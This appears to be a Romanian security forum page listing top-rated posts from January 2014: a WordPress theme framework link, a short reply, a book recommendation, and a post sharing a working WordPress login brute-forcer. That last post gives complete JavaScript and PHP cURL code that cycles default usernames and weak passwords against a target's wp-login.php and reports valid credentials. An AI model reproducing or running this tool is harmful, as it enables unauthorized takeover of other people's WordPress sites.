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Showing content with the highest reputation on 01/03/14 in all areas

  1. Am lucrat mai demult la un WP Theme framework, va las link aici daca vreti sa il folositi, e destul de tare, e Bootstrap Theme Ready. Sunt o gramada de lucruri gata facute si o gramada de avantaje daca vreti sa faceti lucruri in WP_Customize Link : https://github.com/rusuandreirobert/wp-theme-framework Description : WP OOP Theme Logic. Features : Easy OOP WP_Customize Integration Easy way to include assets ( js & styles ) Easy Options Easy Theme Support Nav Walker to make Default WP_Menu look like when it is selected Version Validation Easy Non OOP Functions as helpers Easy Widget Add Custom Header via WP_Customize Skin Handler Custom Background Automatic Logic & PHP Files Loader Bootstrap Ready
    1 point
  2. N-am fost prea atent la topic. Nu am asa ceva si totusi, de ce as face asa ceva ? E proiectul meu, codul meu, scopul meu e sa ajut oameni si sa se implice sa facem lucruri faine, nu sa raspandim ciuma.
    1 point
  3. Legat de subiectul asta, exista o carte scrisa de Dan Brown: Fortareata Digitala care personal mi s-a parut una foarte buna. se trateaza subiectul acesta si merita citita. In principiu Dan Brown nu imi place ca si scriitor insa cartea asta mi-a placut. Enjoy the book.
    1 point
  4. Ieri seara am facut un wp-bruteforce simplu folosind Javascript si putin php(doar pentru cURL) si m-am gandit sa il impart cu voi:D. index.html (asta face tot:) ) <label>Url:</label><input type="text" id="u" /><br> <label>Single user:</label><input type="text" id="s" /><input type="checkbox" id="single" /> <input type="button" value="GO!" onclick="if(this.value=='GO!'){start();this.value='Stop';}else{work=0;this.value='GO!';}" /> <div id="st"></div> <script> var users=Array("admin" ,"user" ,"sysadmin" ,"system" ,"administrator" ,"blog" ,"webmaster" ); var pass=Array("123456" ,"pa$$word" ,"admin" ,"admin123" ,"administrator" ,"qwerty" ,"qwerty1234" ,"andrei123" ); var url=document.getElementById('u').value; var sa=document.getElementById('st'); var single_user; var contor_user; var contor_pass; var total_u; var total_p; var work; var cont_incercari; http=new XMLHttpRequest(); function start(){ single_user="-"; cont_incercari=0; contor_user=0; contor_pass=0; total_u=users.length; total_p=pass.length; work=1; if(document.getElementById('single').checked){ single_user=document.getElementById('s').value; make_get(single_user,pass[0]); }else{ make_get(users[0],pass[0]); } } function make_get(user,pass){ http.open("GET", "get.php?url="+url+"&user="+user+"&pass="+pass, true); http.overrideMimeType('text/html; charset=UTF-8'); http.onreadystatechange = function() { if (http.readyState == 4) { trateaza(); } } http.send(null); } function trateaza(){ sursa=http.responseText; if(work==1){ if(sursa.search("<strong>ERROR</strong>")>-1){ if(single_user!="-"){ if(contor_pass<total_p){ contor_pass++; cont_incercari++; sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+total_p; make_get(single_user,pass[contor_pass]); }else{ alert("Stop"); work=0; } }else{ if(contor_pass<total_p){ contor_pass++; cont_incercari++; }else if(contor_user<total_u){ contor_pass=0; contor_user++; cont_incercari++; }else{ alert("Stop"); work=0; } sa.innerHTML="Incerc "+(cont_incercari+1)+"/"+(total_p*total_u); make_get(users[contor_user],pass[contor_pass]); } }else{ //got him!! alert(users[contor_user]+"::"+pass[contor_pass]); } } } </script> get.php <?php $curl = curl_init($_REQUEST['url'].'/wp-login.php'); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_COOKIEJAR,"c.txt"); curl_setopt($curl,CURLOPT_COOKIEFILE,"c.txt"); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS,"log=".$_REQUEST['user']."&pwd=".$_REQUEST['pass']."&wp-submit=Log+In&redirect_to=".$_REQUEST['url']."/wp-admin/&testcookie=0"); $a = curl_exec($curl); echo $a; ?> Pentru un anumit user completati Single user: si bifati casuta. l-am testat pe firefox ultima versiune cred. Seara buna.
    -1 points
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